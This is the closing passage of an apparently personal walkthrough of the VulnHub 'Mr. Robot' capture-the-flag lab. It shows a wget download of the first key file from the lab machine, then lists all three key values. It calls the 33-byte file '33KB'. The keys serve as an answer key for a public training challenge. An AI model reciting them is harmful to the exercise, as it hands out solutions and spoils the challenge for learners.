--2016-12-03 15:14:47-- http://192.168.159.130/key-1-of-3.txt
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’
key-1-of-3.txt 100%[=======================>] 33 --.-KB/s in 0s
2016-12-03 15:14:47 (4.97 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
The key-1-of-3.txt filesize is only 33KB, very small.
I run cat fsocity.dic to check the content, and confirmed it is a dictionary file. I run cat key-1-of-3.txt and produce this result.
root@kali:~/KING.NET/mr.robot# cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Found it. key-1-of-3.txt value is "073403c8a58a1f80d943455fb30724b9"
So all keys discovered!
  1. key-1-of-3.txt "073403c8a58a1f80d943455fb30724b9"
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".

That's fun ...
Thank you for reading my walk through. I will create a follow video later this week.
And I'm still catching up to all the challenge provided by Vulnhub.com website.
Thank you,
Useful links: